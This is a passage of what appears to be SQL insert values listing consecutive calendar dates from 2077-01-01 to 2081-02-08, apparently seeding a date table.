('2077-01-01'),
('2077-01-02'),
('2077-01-03'),
('2077-01-04'),
('2077-01-05'),
('2077-01-06'),
('2077-01-07'),
('2077-01-08'),
('2077-01-09'),
('2077-01-10'),
('2077-01-11'),
('2077-01-12'),
('2077-01-13'),
('2077-01-14'),
('2077-01-15'),
('2077-01-16'),
('2077-01-17'),
('2077-01-18'),
('2077-01-19'),
('2077-01-20'),
('2077-01-21'),
('2077-01-22'),
('2077-01-23'),
('2077-01-24'),
('2077-01-25'),
('2077-01-26'),
('2077-01-27'),
('2077-01-28'),
('2077-01-29'),
('2077-01-30'),
('2077-01-31'),
('2077-02-01'),
('2077-02-02'),
('2077-02-03'),
('2077-02-04'),
('2077-02-05'),
('2077-02-06'),
('2077-02-07'),
('2077-02-08'),
('2077-02-09'),
('2077-02-10'),
('2077-02-11'),
('2077-02-12'),
('2077-02-13'),
('2077-02-14'),
('2077-02-15'),
('2077-02-16'),
('2077-02-17'),
('2077-02-18'),
('2077-02-19'),
('2077-02-20'),
('2077-02-21'),
('2077-02-22'),
('2077-02-23'),
('2077-02-24'),
('2077-02-25'),
('2077-02-26'),
('2077-02-27'),
('2077-02-28'),
('2077-03-01'),
('2077-03-02'),
('2077-03-03'),
('2077-03-04'),
('2077-03-05'),
('2077-03-06'),
('2077-03-07'),
('2077-03-08'),
('2077-03-09'),
('2077-03-10'),
('2077-03-11'),
('2077-03-12'),
('2077-03-13'),
('2077-03-14'),
('2077-03-15'),
('2077-03-16'),
('2077-03-17'),
('2077-03-18'),
('2077-03-19'),
('2077-03-20'),
('2077-03-21'),
('2077-03-22'),
('2077-03-23'),
('2077-03-24'),
('2077-03-25'),
('2077-03-26'),
('2077-03-27'),
('2077-03-28'),
('2077-03-29'),
('2077-03-30'),
('2077-03-31'),
('2077-04-01'),
('2077-04-02'),
('2077-04-03'),
('2077-04-04'),
('2077-04-05'),
('2077-04-06'),
('2077-04-07'),
('2077-04-08'),
('2077-04-09'),
('2077-04-10'),
('2077-04-11'),
('2077-04-12'),
('2077-04-13'),
('2077-04-14'),
('2077-04-15'),
('2077-04-16'),
('2077-04-17'),
('2077-04-18'),
('2077-04-19'),
('2077-04-20'),
('2077-04-21'),
('2077-04-22'),
('2077-04-23'),
('2077-04-24'),
('2077-04-25'),
('2077-04-26'),
('2077-04-27'),
('2077-04-28'),
('2077-04-29'),
('2077-04-30'),
('2077-05-01'),
('2077-05-02'),
('2077-05-03'),
('2077-05-04'),
('2077-05-05'),
('2077-05-06'),
('2077-05-07'),
('2077-05-08'),
('2077-05-09'),
('2077-05-10'),
('2077-05-11'),
('2077-05-12'),
('2077-05-13'),
('2077-05-14'),
('2077-05-15'),
('2077-05-16'),
('2077-05-17'),
('2077-05-18'),
('2077-05-19'),
('2077-05-20'),
('2077-05-21'),
('2077-05-22'),
('2077-05-23'),
('2077-05-24'),
('2077-05-25'),
('2077-05-26'),
('2077-05-27'),
('2077-05-28'),
('2077-05-29'),
('2077-05-30'),
('2077-05-31'),
('2077-06-01'),
('2077-06-02'),
('2077-06-03'),
('2077-06-04'),
('2077-06-05'),
('2077-06-06'),
('2077-06-07'),
('2077-06-08'),
('2077-06-09'),
('2077-06-10'),
('2077-06-11'),
('2077-06-12'),
('2077-06-13'),
('2077-06-14'),
('2077-06-15'),
('2077-06-16'),
('2077-06-17'),
('2077-06-18'),
('2077-06-19'),
('2077-06-20'),
('2077-06-21'),
('2077-06-22'),
('2077-06-23'),
('2077-06-24'),
('2077-06-25'),
('2077-06-26'),
('2077-06-27'),
('2077-06-28'),
('2077-06-29'),
('2077-06-30'),
('2077-07-01'),
('2077-07-02'),
('2077-07-03'),
('2077-07-04'),
('2077-07-05'),
('2077-07-06'),
('2077-07-07'),
('2077-07-08'),
('2077-07-09'),
('2077-07-10'),
('2077-07-11'),
('2077-07-12'),
('2077-07-13'),
('2077-07-14'),
('2077-07-15'),
('2077-07-16'),
('2077-07-17'),
('2077-07-18'),
('2077-07-19'),
('2077-07-20'),
('2077-07-21'),
('2077-07-22'),
('2077-07-23'),
('2077-07-24'),
('2077-07-25'),
('2077-07-26'),
('2077-07-27'),
('2077-07-28'),
('2077-07-29'),
('2077-07-30'),
('2077-07-31'),
('2077-08-01'),
('2077-08-02'),
('2077-08-03'),
('2077-08-04'),
('2077-08-05'),
('2077-08-06'),
('2077-08-07'),
('2077-08-08'),
('2077-08-09'),
('2077-08-10'),
('2077-08-11'),
('2077-08-12'),
('2077-08-13'),
('2077-08-14'),
('2077-08-15'),
('2077-08-16'),
('2077-08-17'),
('2077-08-18'),
('2077-08-19'),
('2077-08-20'),
('2077-08-21'),
('2077-08-22'),
('2077-08-23'),
('2077-08-24'),
('2077-08-25'),
('2077-08-26'),
('2077-08-27'),
('2077-08-28'),
('2077-08-29'),
('2077-08-30'),
('2077-08-31'),
('2077-09-01'),
('2077-09-02'),
('2077-09-03'),
('2077-09-04'),
('2077-09-05'),
('2077-09-06'),
('2077-09-07'),
('2077-09-08'),
('2077-09-09'),
('2077-09-10'),
('2077-09-11'),
('2077-09-12'),
('2077-09-13'),
('2077-09-14'),
('2077-09-15'),
('2077-09-16'),
('2077-09-17'),
('2077-09-18'),
('2077-09-19'),
('2077-09-20'),
('2077-09-21'),
('2077-09-22'),
('2077-09-23'),
('2077-09-24'),
('2077-09-25'),
('2077-09-26'),
('2077-09-27'),
('2077-09-28'),
('2077-09-29'),
('2077-09-30'),
('2077-10-01'),
('2077-10-02'),
('2077-10-03'),
('2077-10-04'),
('2077-10-05'),
('2077-10-06'),
('2077-10-07'),
('2077-10-08'),
('2077-10-09'),
('2077-10-10'),
('2077-10-11'),
('2077-10-12'),
('2077-10-13'),
('2077-10-14'),
('2077-10-15'),
('2077-10-16'),
('2077-10-17'),
('2077-10-18'),
('2077-10-19'),
('2077-10-20'),
('2077-10-21'),
('2077-10-22'),
('2077-10-23'),
('2077-10-24'),
('2077-10-25'),
('2077-10-26'),
('2077-10-27'),
('2077-10-28'),
('2077-10-29'),
('2077-10-30'),
('2077-10-31'),
('2077-11-01'),
('2077-11-02'),
('2077-11-03'),
('2077-11-04'),
('2077-11-05'),
('2077-11-06'),
('2077-11-07'),
('2077-11-08'),
('2077-11-09'),
('2077-11-10'),
('2077-11-11'),
('2077-11-12'),
('2077-11-13'),
('2077-11-14'),
('2077-11-15'),
('2077-11-16'),
('2077-11-17'),
('2077-11-18'),
('2077-11-19'),
('2077-11-20'),
('2077-11-21'),
('2077-11-22'),
('2077-11-23'),
('2077-11-24'),
('2077-11-25'),
('2077-11-26'),
('2077-11-27'),
('2077-11-28'),
('2077-11-29'),
('2077-11-30'),
('2077-12-01'),
('2077-12-02'),
('2077-12-03'),
('2077-12-04'),
('2077-12-05'),
('2077-12-06'),
('2077-12-07'),
('2077-12-08'),
('2077-12-09'),
('2077-12-10'),
('2077-12-11'),
('2077-12-12'),
('2077-12-13'),
('2077-12-14'),
('2077-12-15'),
('2077-12-16'),
('2077-12-17'),
('2077-12-18'),
('2077-12-19'),
('2077-12-20'),
('2077-12-21'),
('2077-12-22'),
('2077-12-23'),
('2077-12-24'),
('2077-12-25'),
('2077-12-26'),
('2077-12-27'),
('2077-12-28'),
('2077-12-29'),
('2077-12-30'),
('2077-12-31'),
('2078-01-01'),
('2078-01-02'),
('2078-01-03'),
('2078-01-04'),
('2078-01-05'),
('2078-01-06'),
('2078-01-07'),
('2078-01-08'),
('2078-01-09'),
('2078-01-10'),
('2078-01-11'),
('2078-01-12'),
('2078-01-13'),
('2078-01-14'),
('2078-01-15'),
('2078-01-16'),
('2078-01-17'),
('2078-01-18'),
('2078-01-19'),
('2078-01-20'),
('2078-01-21'),
('2078-01-22'),
('2078-01-23'),
('2078-01-24'),
('2078-01-25'),
('2078-01-26'),
('2078-01-27'),
('2078-01-28'),
('2078-01-29'),
('2078-01-30'),
('2078-01-31'),
('2078-02-01'),
('2078-02-02'),
('2078-02-03'),
('2078-02-04'),
('2078-02-05'),
('2078-02-06'),
('2078-02-07'),
('2078-02-08'),
('2078-02-09'),
('2078-02-10'),
('2078-02-11'),
('2078-02-12'),
('2078-02-13'),
('2078-02-14'),
('2078-02-15'),
('2078-02-16'),
('2078-02-17'),
('2078-02-18'),
('2078-02-19'),
('2078-02-20'),
('2078-02-21'),
('2078-02-22'),
('2078-02-23'),
('2078-02-24'),
('2078-02-25'),
('2078-02-26'),
('2078-02-27'),
('2078-02-28'),
('2078-03-01'),
('2078-03-02'),
('2078-03-03'),
('2078-03-04'),
('2078-03-05'),
('2078-03-06'),
('2078-03-07'),
('2078-03-08'),
('2078-03-09'),
('2078-03-10'),
('2078-03-11'),
('2078-03-12'),
('2078-03-13'),
('2078-03-14'),
('2078-03-15'),
('2078-03-16'),
('2078-03-17'),
('2078-03-18'),
('2078-03-19'),
('2078-03-20'),
('2078-03-21'),
('2078-03-22'),
('2078-03-23'),
('2078-03-24'),
('2078-03-25'),
('2078-03-26'),
('2078-03-27'),
('2078-03-28'),
('2078-03-29'),
('2078-03-30'),
('2078-03-31'),
('2078-04-01'),
('2078-04-02'),
('2078-04-03'),
('2078-04-04'),
('2078-04-05'),
('2078-04-06'),
('2078-04-07'),
('2078-04-08'),
('2078-04-09'),
('2078-04-10'),
('2078-04-11'),
('2078-04-12'),
('2078-04-13'),
('2078-04-14'),
('2078-04-15'),
('2078-04-16'),
('2078-04-17'),
('2078-04-18'),
('2078-04-19'),
('2078-04-20'),
('2078-04-21'),
('2078-04-22'),
('2078-04-23'),
('2078-04-24'),
('2078-04-25'),
('2078-04-26'),
('2078-04-27'),
('2078-04-28'),
('2078-04-29'),
('2078-04-30'),
('2078-05-01'),
('2078-05-02'),
('2078-05-03'),
('2078-05-04'),
('2078-05-05'),
('2078-05-06'),
('2078-05-07'),
('2078-05-08'),
('2078-05-09'),
('2078-05-10'),
('2078-05-11'),
('2078-05-12'),
('2078-05-13'),
('2078-05-14'),
('2078-05-15'),
('2078-05-16'),
('2078-05-17'),
('2078-05-18'),
('2078-05-19'),
('2078-05-20'),
('2078-05-21'),
('2078-05-22'),
('2078-05-23'),
('2078-05-24'),
('2078-05-25'),
('2078-05-26'),
('2078-05-27'),
('2078-05-28'),
('2078-05-29'),
('2078-05-30'),
('2078-05-31'),
('2078-06-01'),
('2078-06-02'),
('2078-06-03'),
('2078-06-04'),
('2078-06-05'),
('2078-06-06'),
('2078-06-07'),
('2078-06-08'),
('2078-06-09'),
('2078-06-10'),
('2078-06-11'),
('2078-06-12'),
('2078-06-13'),
('2078-06-14'),
('2078-06-15'),
('2078-06-16'),
('2078-06-17'),
('2078-06-18'),
('2078-06-19'),
('2078-06-20'),
('2078-06-21'),
('2078-06-22'),
('2078-06-23'),
('2078-06-24'),
('2078-06-25'),
('2078-06-26'),
('2078-06-27'),
('2078-06-28'),
('2078-06-29'),
('2078-06-30'),
('2078-07-01'),
('2078-07-02'),
('2078-07-03'),
('2078-07-04'),
('2078-07-05'),
('2078-07-06'),
('2078-07-07'),
('2078-07-08'),
('2078-07-09'),
('2078-07-10'),
('2078-07-11'),
('2078-07-12'),
('2078-07-13'),
('2078-07-14'),
('2078-07-15'),
('2078-07-16'),
('2078-07-17'),
('2078-07-18'),
('2078-07-19'),
('2078-07-20'),
('2078-07-21'),
('2078-07-22'),
('2078-07-23'),
('2078-07-24'),
('2078-07-25'),
('2078-07-26'),
('2078-07-27'),
('2078-07-28'),
('2078-07-29'),
('2078-07-30'),
('2078-07-31'),
('2078-08-01'),
('2078-08-02'),
('2078-08-03'),
('2078-08-04'),
('2078-08-05'),
('2078-08-06'),
('2078-08-07'),
('2078-08-08'),
('2078-08-09'),
('2078-08-10'),
('2078-08-11'),
('2078-08-12'),
('2078-08-13'),
('2078-08-14'),
('2078-08-15'),
('2078-08-16'),
('2078-08-17'),
('2078-08-18'),
('2078-08-19'),
('2078-08-20'),
('2078-08-21'),
('2078-08-22'),
('2078-08-23'),
('2078-08-24'),
('2078-08-25'),
('2078-08-26'),
('2078-08-27'),
('2078-08-28'),
('2078-08-29'),
('2078-08-30'),
('2078-08-31'),
('2078-09-01'),
('2078-09-02'),
('2078-09-03'),
('2078-09-04'),
('2078-09-05'),
('2078-09-06'),
('2078-09-07'),
('2078-09-08'),
('2078-09-09'),
('2078-09-10'),
('2078-09-11'),
('2078-09-12'),
('2078-09-13'),
('2078-09-14'),
('2078-09-15'),
('2078-09-16'),
('2078-09-17'),
('2078-09-18'),
('2078-09-19'),
('2078-09-20'),
('2078-09-21'),
('2078-09-22'),
('2078-09-23'),
('2078-09-24'),
('2078-09-25'),
('2078-09-26'),
('2078-09-27'),
('2078-09-28'),
('2078-09-29'),
('2078-09-30'),
('2078-10-01'),
('2078-10-02'),
('2078-10-03'),
('2078-10-04'),
('2078-10-05'),
('2078-10-06'),
('2078-10-07'),
('2078-10-08'),
('2078-10-09'),
('2078-10-10'),
('2078-10-11'),
('2078-10-12'),
('2078-10-13'),
('2078-10-14'),
('2078-10-15'),
('2078-10-16'),
('2078-10-17'),
('2078-10-18'),
('2078-10-19'),
('2078-10-20'),
('2078-10-21'),
('2078-10-22'),
('2078-10-23'),
('2078-10-24'),
('2078-10-25'),
('2078-10-26'),
('2078-10-27'),
('2078-10-28'),
('2078-10-29'),
('2078-10-30'),
('2078-10-31'),
('2078-11-01'),
('2078-11-02'),
('2078-11-03'),
('2078-11-04'),
('2078-11-05'),
('2078-11-06'),
('2078-11-07'),
('2078-11-08'),
('2078-11-09'),
('2078-11-10'),
('2078-11-11'),
('2078-11-12'),
('2078-11-13'),
('2078-11-14'),
('2078-11-15'),
('2078-11-16'),
('2078-11-17'),
('2078-11-18'),
('2078-11-19'),
('2078-11-20'),
('2078-11-21'),
('2078-11-22'),
('2078-11-23'),
('2078-11-24'),
('2078-11-25'),
('2078-11-26'),
('2078-11-27'),
('2078-11-28'),
('2078-11-29'),
('2078-11-30'),
('2078-12-01'),
('2078-12-02'),
('2078-12-03'),
('2078-12-04'),
('2078-12-05'),
('2078-12-06'),
('2078-12-07'),
('2078-12-08'),
('2078-12-09'),
('2078-12-10'),
('2078-12-11'),
('2078-12-12'),
('2078-12-13'),
('2078-12-14'),
('2078-12-15'),
('2078-12-16'),
('2078-12-17'),
('2078-12-18'),
('2078-12-19'),
('2078-12-20'),
('2078-12-21'),
('2078-12-22'),
('2078-12-23'),
('2078-12-24'),
('2078-12-25'),
('2078-12-26'),
('2078-12-27'),
('2078-12-28'),
('2078-12-29'),
('2078-12-30'),
('2078-12-31'),
('2079-01-01'),
('2079-01-02'),
('2079-01-03'),
('2079-01-04'),
('2079-01-05'),
('2079-01-06'),
('2079-01-07'),
('2079-01-08'),
('2079-01-09'),
('2079-01-10'),
('2079-01-11'),
('2079-01-12'),
('2079-01-13'),
('2079-01-14'),
('2079-01-15'),
('2079-01-16'),
('2079-01-17'),
('2079-01-18'),
('2079-01-19'),
('2079-01-20'),
('2079-01-21'),
('2079-01-22'),
('2079-01-23'),
('2079-01-24'),
('2079-01-25'),
('2079-01-26'),
('2079-01-27'),
('2079-01-28'),
('2079-01-29'),
('2079-01-30'),
('2079-01-31'),
('2079-02-01'),
('2079-02-02'),
('2079-02-03'),
('2079-02-04'),
('2079-02-05'),
('2079-02-06'),
('2079-02-07'),
('2079-02-08'),
('2079-02-09'),
('2079-02-10'),
('2079-02-11'),
('2079-02-12'),
('2079-02-13'),
('2079-02-14'),
('2079-02-15'),
('2079-02-16'),
('2079-02-17'),
('2079-02-18'),
('2079-02-19'),
('2079-02-20'),
('2079-02-21'),
('2079-02-22'),
('2079-02-23'),
('2079-02-24'),
('2079-02-25'),
('2079-02-26'),
('2079-02-27'),
('2079-02-28'),
('2079-03-01'),
('2079-03-02'),
('2079-03-03'),
('2079-03-04'),
('2079-03-05'),
('2079-03-06'),
('2079-03-07'),
('2079-03-08'),
('2079-03-09'),
('2079-03-10'),
('2079-03-11'),
('2079-03-12'),
('2079-03-13'),
('2079-03-14'),
('2079-03-15'),
('2079-03-16'),
('2079-03-17'),
('2079-03-18'),
('2079-03-19'),
('2079-03-20'),
('2079-03-21'),
('2079-03-22'),
('2079-03-23'),
('2079-03-24'),
('2079-03-25'),
('2079-03-26'),
('2079-03-27'),
('2079-03-28'),
('2079-03-29'),
('2079-03-30'),
('2079-03-31'),
('2079-04-01'),
('2079-04-02'),
('2079-04-03'),
('2079-04-04'),
('2079-04-05'),
('2079-04-06'),
('2079-04-07'),
('2079-04-08'),
('2079-04-09'),
('2079-04-10'),
('2079-04-11'),
('2079-04-12'),
('2079-04-13'),
('2079-04-14'),
('2079-04-15'),
('2079-04-16'),
('2079-04-17'),
('2079-04-18'),
('2079-04-19'),
('2079-04-20'),
('2079-04-21'),
('2079-04-22'),
('2079-04-23'),
('2079-04-24'),
('2079-04-25'),
('2079-04-26'),
('2079-04-27'),
('2079-04-28'),
('2079-04-29'),
('2079-04-30'),
('2079-05-01'),
('2079-05-02'),
('2079-05-03'),
('2079-05-04'),
('2079-05-05'),
('2079-05-06'),
('2079-05-07'),
('2079-05-08'),
('2079-05-09'),
('2079-05-10'),
('2079-05-11'),
('2079-05-12'),
('2079-05-13'),
('2079-05-14'),
('2079-05-15'),
('2079-05-16'),
('2079-05-17'),
('2079-05-18'),
('2079-05-19'),
('2079-05-20'),
('2079-05-21'),
('2079-05-22'),
('2079-05-23'),
('2079-05-24'),
('2079-05-25'),
('2079-05-26'),
('2079-05-27'),
('2079-05-28'),
('2079-05-29'),
('2079-05-30'),
('2079-05-31'),
('2079-06-01'),
('2079-06-02'),
('2079-06-03'),
('2079-06-04'),
('2079-06-05'),
('2079-06-06'),
('2079-06-07'),
('2079-06-08'),
('2079-06-09'),
('2079-06-10'),
('2079-06-11'),
('2079-06-12'),
('2079-06-13'),
('2079-06-14'),
('2079-06-15'),
('2079-06-16'),
('2079-06-17'),
('2079-06-18'),
('2079-06-19'),
('2079-06-20'),
('2079-06-21'),
('2079-06-22'),
('2079-06-23'),
('2079-06-24'),
('2079-06-25'),
('2079-06-26'),
('2079-06-27'),
('2079-06-28'),
('2079-06-29'),
('2079-06-30'),
('2079-07-01'),
('2079-07-02'),
('2079-07-03'),
('2079-07-04'),
('2079-07-05'),
('2079-07-06'),
('2079-07-07'),
('2079-07-08'),
('2079-07-09'),
('2079-07-10'),
('2079-07-11'),
('2079-07-12'),
('2079-07-13'),
('2079-07-14'),
('2079-07-15'),
('2079-07-16'),
('2079-07-17'),
('2079-07-18'),
('2079-07-19'),
('2079-07-20'),
('2079-07-21'),
('2079-07-22'),
('2079-07-23'),
('2079-07-24'),
('2079-07-25'),
('2079-07-26'),
('2079-07-27'),
('2079-07-28'),
('2079-07-29'),
('2079-07-30'),
('2079-07-31'),
('2079-08-01'),
('2079-08-02'),
('2079-08-03'),
('2079-08-04'),
('2079-08-05'),
('2079-08-06'),
('2079-08-07'),
('2079-08-08'),
('2079-08-09'),
('2079-08-10'),
('2079-08-11'),
('2079-08-12'),
('2079-08-13'),
('2079-08-14'),
('2079-08-15'),
('2079-08-16'),
('2079-08-17'),
('2079-08-18'),
('2079-08-19'),
('2079-08-20'),
('2079-08-21'),
('2079-08-22'),
('2079-08-23'),
('2079-08-24'),
('2079-08-25'),
('2079-08-26'),
('2079-08-27'),
('2079-08-28'),
('2079-08-29'),
('2079-08-30'),
('2079-08-31'),
('2079-09-01'),
('2079-09-02'),
('2079-09-03'),
('2079-09-04'),
('2079-09-05'),
('2079-09-06'),
('2079-09-07'),
('2079-09-08'),
('2079-09-09'),
('2079-09-10'),
('2079-09-11'),
('2079-09-12'),
('2079-09-13'),
('2079-09-14'),
('2079-09-15'),
('2079-09-16'),
('2079-09-17'),
('2079-09-18'),
('2079-09-19'),
('2079-09-20'),
('2079-09-21'),
('2079-09-22'),
('2079-09-23'),
('2079-09-24'),
('2079-09-25'),
('2079-09-26'),
('2079-09-27'),
('2079-09-28'),
('2079-09-29'),
('2079-09-30'),
('2079-10-01'),
('2079-10-02'),
('2079-10-03'),
('2079-10-04'),
('2079-10-05'),
('2079-10-06'),
('2079-10-07'),
('2079-10-08'),
('2079-10-09'),
('2079-10-10'),
('2079-10-11'),
('2079-10-12'),
('2079-10-13'),
('2079-10-14'),
('2079-10-15'),
('2079-10-16'),
('2079-10-17'),
('2079-10-18'),
('2079-10-19'),
('2079-10-20'),
('2079-10-21'),
('2079-10-22'),
('2079-10-23'),
('2079-10-24'),
('2079-10-25'),
('2079-10-26'),
('2079-10-27'),
('2079-10-28'),
('2079-10-29'),
('2079-10-30'),
('2079-10-31'),
('2079-11-01'),
('2079-11-02'),
('2079-11-03'),
('2079-11-04'),
('2079-11-05'),
('2079-11-06'),
('2079-11-07'),
('2079-11-08'),
('2079-11-09'),
('2079-11-10'),
('2079-11-11'),
('2079-11-12'),
('2079-11-13'),
('2079-11-14'),
('2079-11-15'),
('2079-11-16'),
('2079-11-17'),
('2079-11-18'),
('2079-11-19'),
('2079-11-20'),
('2079-11-21'),
('2079-11-22'),
('2079-11-23'),
('2079-11-24'),
('2079-11-25'),
('2079-11-26'),
('2079-11-27'),
('2079-11-28'),
('2079-11-29'),
('2079-11-30'),
('2079-12-01'),
('2079-12-02'),
('2079-12-03'),
('2079-12-04'),
('2079-12-05'),
('2079-12-06'),
('2079-12-07'),
('2079-12-08'),
('2079-12-09'),
('2079-12-10'),
('2079-12-11'),
('2079-12-12'),
('2079-12-13'),
('2079-12-14'),
('2079-12-15'),
('2079-12-16'),
('2079-12-17'),
('2079-12-18'),
('2079-12-19'),
('2079-12-20'),
('2079-12-21'),
('2079-12-22'),
('2079-12-23'),
('2079-12-24'),
('2079-12-25'),
('2079-12-26'),
('2079-12-27'),
('2079-12-28'),
('2079-12-29'),
('2079-12-30'),
('2079-12-31'),
('2080-01-01'),
('2080-01-02'),
('2080-01-03'),
('2080-01-04'),
('2080-01-05'),
('2080-01-06'),
('2080-01-07'),
('2080-01-08'),
('2080-01-09'),
('2080-01-10'),
('2080-01-11'),
('2080-01-12'),
('2080-01-13'),
('2080-01-14'),
('2080-01-15'),
('2080-01-16'),
('2080-01-17'),
('2080-01-18'),
('2080-01-19'),
('2080-01-20'),
('2080-01-21'),
('2080-01-22'),
('2080-01-23'),
('2080-01-24'),
('2080-01-25'),
('2080-01-26'),
('2080-01-27'),
('2080-01-28'),
('2080-01-29'),
('2080-01-30'),
('2080-01-31'),
('2080-02-01'),
('2080-02-02'),
('2080-02-03'),
('2080-02-04'),
('2080-02-05'),
('2080-02-06'),
('2080-02-07'),
('2080-02-08'),
('2080-02-09'),
('2080-02-10'),
('2080-02-11'),
('2080-02-12'),
('2080-02-13'),
('2080-02-14'),
('2080-02-15'),
('2080-02-16'),
('2080-02-17'),
('2080-02-18'),
('2080-02-19'),
('2080-02-20'),
('2080-02-21'),
('2080-02-22'),
('2080-02-23'),
('2080-02-24'),
('2080-02-25'),
('2080-02-26'),
('2080-02-27'),
('2080-02-28'),
('2080-02-29'),
('2080-03-01'),
('2080-03-02'),
('2080-03-03'),
('2080-03-04'),
('2080-03-05'),
('2080-03-06'),
('2080-03-07'),
('2080-03-08'),
('2080-03-09'),
('2080-03-10'),
('2080-03-11'),
('2080-03-12'),
('2080-03-13'),
('2080-03-14'),
('2080-03-15'),
('2080-03-16'),
('2080-03-17'),
('2080-03-18'),
('2080-03-19'),
('2080-03-20'),
('2080-03-21'),
('2080-03-22'),
('2080-03-23'),
('2080-03-24'),
('2080-03-25'),
('2080-03-26'),
('2080-03-27'),
('2080-03-28'),
('2080-03-29'),
('2080-03-30'),
('2080-03-31'),
('2080-04-01'),
('2080-04-02'),
('2080-04-03'),
('2080-04-04'),
('2080-04-05'),
('2080-04-06'),
('2080-04-07'),
('2080-04-08'),
('2080-04-09'),
('2080-04-10'),
('2080-04-11'),
('2080-04-12'),
('2080-04-13'),
('2080-04-14'),
('2080-04-15'),
('2080-04-16'),
('2080-04-17'),
('2080-04-18'),
('2080-04-19'),
('2080-04-20'),
('2080-04-21'),
('2080-04-22'),
('2080-04-23'),
('2080-04-24'),
('2080-04-25'),
('2080-04-26'),
('2080-04-27'),
('2080-04-28'),
('2080-04-29'),
('2080-04-30'),
('2080-05-01'),
('2080-05-02'),
('2080-05-03'),
('2080-05-04'),
('2080-05-05'),
('2080-05-06'),
('2080-05-07'),
('2080-05-08'),
('2080-05-09'),
('2080-05-10'),
('2080-05-11'),
('2080-05-12'),
('2080-05-13'),
('2080-05-14'),
('2080-05-15'),
('2080-05-16'),
('2080-05-17'),
('2080-05-18'),
('2080-05-19'),
('2080-05-20'),
('2080-05-21'),
('2080-05-22'),
('2080-05-23'),
('2080-05-24'),
('2080-05-25'),
('2080-05-26'),
('2080-05-27'),
('2080-05-28'),
('2080-05-29'),
('2080-05-30'),
('2080-05-31'),
('2080-06-01'),
('2080-06-02'),
('2080-06-03'),
('2080-06-04'),
('2080-06-05'),
('2080-06-06'),
('2080-06-07'),
('2080-06-08'),
('2080-06-09'),
('2080-06-10'),
('2080-06-11'),
('2080-06-12'),
('2080-06-13'),
('2080-06-14'),
('2080-06-15'),
('2080-06-16'),
('2080-06-17'),
('2080-06-18'),
('2080-06-19'),
('2080-06-20'),
('2080-06-21'),
('2080-06-22'),
('2080-06-23'),
('2080-06-24'),
('2080-06-25'),
('2080-06-26'),
('2080-06-27'),
('2080-06-28'),
('2080-06-29'),
('2080-06-30'),
('2080-07-01'),
('2080-07-02'),
('2080-07-03'),
('2080-07-04'),
('2080-07-05'),
('2080-07-06'),
('2080-07-07'),
('2080-07-08'),
('2080-07-09'),
('2080-07-10'),
('2080-07-11'),
('2080-07-12'),
('2080-07-13'),
('2080-07-14'),
('2080-07-15'),
('2080-07-16'),
('2080-07-17'),
('2080-07-18'),
('2080-07-19'),
('2080-07-20'),
('2080-07-21'),
('2080-07-22'),
('2080-07-23'),
('2080-07-24'),
('2080-07-25'),
('2080-07-26'),
('2080-07-27'),
('2080-07-28'),
('2080-07-29'),
('2080-07-30'),
('2080-07-31'),
('2080-08-01'),
('2080-08-02'),
('2080-08-03'),
('2080-08-04'),
('2080-08-05'),
('2080-08-06'),
('2080-08-07'),
('2080-08-08'),
('2080-08-09'),
('2080-08-10'),
('2080-08-11'),
('2080-08-12'),
('2080-08-13'),
('2080-08-14'),
('2080-08-15'),
('2080-08-16'),
('2080-08-17'),
('2080-08-18'),
('2080-08-19'),
('2080-08-20'),
('2080-08-21'),
('2080-08-22'),
('2080-08-23'),
('2080-08-24'),
('2080-08-25'),
('2080-08-26'),
('2080-08-27'),
('2080-08-28'),
('2080-08-29'),
('2080-08-30'),
('2080-08-31'),
('2080-09-01'),
('2080-09-02'),
('2080-09-03'),
('2080-09-04'),
('2080-09-05'),
('2080-09-06'),
('2080-09-07'),
('2080-09-08'),
('2080-09-09'),
('2080-09-10'),
('2080-09-11'),
('2080-09-12'),
('2080-09-13'),
('2080-09-14'),
('2080-09-15'),
('2080-09-16'),
('2080-09-17'),
('2080-09-18'),
('2080-09-19'),
('2080-09-20'),
('2080-09-21'),
('2080-09-22'),
('2080-09-23'),
('2080-09-24'),
('2080-09-25'),
('2080-09-26'),
('2080-09-27'),
('2080-09-28'),
('2080-09-29'),
('2080-09-30'),
('2080-10-01'),
('2080-10-02'),
('2080-10-03'),
('2080-10-04'),
('2080-10-05'),
('2080-10-06'),
('2080-10-07'),
('2080-10-08'),
('2080-10-09'),
('2080-10-10'),
('2080-10-11'),
('2080-10-12'),
('2080-10-13'),
('2080-10-14'),
('2080-10-15'),
('2080-10-16'),
('2080-10-17'),
('2080-10-18'),
('2080-10-19'),
('2080-10-20'),
('2080-10-21'),
('2080-10-22'),
('2080-10-23'),
('2080-10-24'),
('2080-10-25'),
('2080-10-26'),
('2080-10-27'),
('2080-10-28'),
('2080-10-29'),
('2080-10-30'),
('2080-10-31'),
('2080-11-01'),
('2080-11-02'),
('2080-11-03'),
('2080-11-04'),
('2080-11-05'),
('2080-11-06'),
('2080-11-07'),
('2080-11-08'),
('2080-11-09'),
('2080-11-10'),
('2080-11-11'),
('2080-11-12'),
('2080-11-13'),
('2080-11-14'),
('2080-11-15'),
('2080-11-16'),
('2080-11-17'),
('2080-11-18'),
('2080-11-19'),
('2080-11-20'),
('2080-11-21'),
('2080-11-22'),
('2080-11-23'),
('2080-11-24'),
('2080-11-25'),
('2080-11-26'),
('2080-11-27'),
('2080-11-28'),
('2080-11-29'),
('2080-11-30'),
('2080-12-01'),
('2080-12-02'),
('2080-12-03'),
('2080-12-04'),
('2080-12-05'),
('2080-12-06'),
('2080-12-07'),
('2080-12-08'),
('2080-12-09'),
('2080-12-10'),
('2080-12-11'),
('2080-12-12'),
('2080-12-13'),
('2080-12-14'),
('2080-12-15'),
('2080-12-16'),
('2080-12-17'),
('2080-12-18'),
('2080-12-19'),
('2080-12-20'),
('2080-12-21'),
('2080-12-22'),
('2080-12-23'),
('2080-12-24'),
('2080-12-25'),
('2080-12-26'),
('2080-12-27'),
('2080-12-28'),
('2080-12-29'),
('2080-12-30'),
('2080-12-31'),
('2081-01-01'),
('2081-01-02'),
('2081-01-03'),
('2081-01-04'),
('2081-01-05'),
('2081-01-06'),
('2081-01-07'),
('2081-01-08'),
('2081-01-09'),
('2081-01-10'),
('2081-01-11'),
('2081-01-12'),
('2081-01-13'),
('2081-01-14'),
('2081-01-15'),
('2081-01-16'),
('2081-01-17'),
('2081-01-18'),
('2081-01-19'),
('2081-01-20'),
('2081-01-21'),
('2081-01-22'),
('2081-01-23'),
('2081-01-24'),
('2081-01-25'),
('2081-01-26'),
('2081-01-27'),
('2081-01-28'),
('2081-01-29'),
('2081-01-30'),
('2081-01-31'),
('2081-02-01'),
('2081-02-02'),
('2081-02-03'),
('2081-02-04'),
('2081-02-05'),
('2081-02-06'),
('2081-02-07'),
('2081-02-08'),
